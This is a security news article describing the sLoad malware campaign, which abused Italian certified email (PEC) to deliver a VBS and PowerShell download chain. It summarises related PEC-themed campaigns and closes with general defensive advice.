Light Dark
October 7, 2019 By David Bisson 2 min read

Attackers are leveraging certified emails to target Italian users with samples of the sLoad malware family.

According to Cybaze-Yoroi ZLAB, the sLoad campaign began when criminals used certified emails to target Italian organizations and consultants affiliated with professional associations. Known as posta elettronica certificata (PEC) in Italy, certified emails are essentially normal email messages that come with an added guarantee of the sender’s identity. This verification lulled recipients into a false sense of security and tricked them into opening the attached .ZIP file.

Once opened, unlike previous attack campaigns, the .ZIP archive didn’t hide PowerShell code. Instead, it contained a corrupted PDF document and a VBS script. The first item attempted to trick the recipient that all was well so that they would run the script. If they complied, the script launched a PowerShell script retrieved from the attackers’ infrastructure that downloaded a malicious .JPG using bitsadmin.exe. This technique helped the campaign evade detection from AV tools while the image file loaded another PowerShell script that established persistence on the infected machine and used a series of other commands to download the final payload.

A Wave of Attacks Exploiting Posta Elettronica Certificata (PEC)

The sLoad operation isn’t the first attack campaign to involve certified email in some way. In January 2017, My Online Security detected a malspam campaign that used “posta certifica” in the subject line and body of its attack emails. Approximately two years later, researchers at ESET observed DanaBot combing through victims’ inboxes for emails specifically containing the substring “pec,” presumably in an effort to target corporate and public administration emails. Then, in April 2019, Cisco Talos discovered attackers pairing PEC with the JasperLoader downloader to target Italians with the Gootkit banking Trojan.

Help Defend Against sLoad Malware

Security professionals can help their organizations defend against sLoad by moving systems away from a model of escalated privilege access and toward one of least privilege through access management, multifactor authentication (MFA) and other security controls. Employee security awareness training, along with sophisticated security information and event management (SIEM) tools, can help organizations detect and defend against PowerShell attacks.

 |  |  |  |  |  |  |  |  | 
David Bisson
Contributing Editor

More from

May 6, 2024

Evolving red teaming for AI environments

2 min read - As AI becomes more ingrained in businesses and daily life, the importance of security grows more paramount. In fact, according to the IBM Institute for Business Value, 96% of executives say adopting generative AI (GenAI) makes a security breach likely in their organization in the next three years. Whether it’s a model performing unintended actions, generating misleading or harmful responses or revealing sensitive information, in the AI era security can no longer be an afterthought to innovation.AI red teaming is emerging…

May 3, 2024

What we can learn from the best collegiate cyber defenders

3 min read - This year marked the 19th season of the National Collegiate Cyber Defense Competition (NCCDC). For those unfamiliar, CCDC is a competition that puts student teams in charge of managing IT for a fictitious company as the network is undergoing a fundamental transformation. This year the challenge involved a common scenario: a merger. Ten finalist teams were tasked with managing IT infrastructure during this migrational period and, as an added bonus, the networks were simultaneously attacked by a group of red…

May 2, 2024

A spotlight on Akira ransomware from X-Force Incident Response and Threat Intelligence

7 min read - This article was made possible thanks to contributions from Aaron Gdanski.IBM X-Force Incident Response and Threat Intelligence teams have investigated several Akira ransomware attacks since this threat actor group emerged in March 2023. This blog will share X-Force’s unique perspective on Akira gained while observing the threat actors behind this ransomware, including commands used to deploy the ransomware, active exploitation of CVE-2023-20269 and analysis of the ransomware binary.The Akira ransomware group has gained notoriety in the current cybersecurity landscape, underscored…

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2024 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature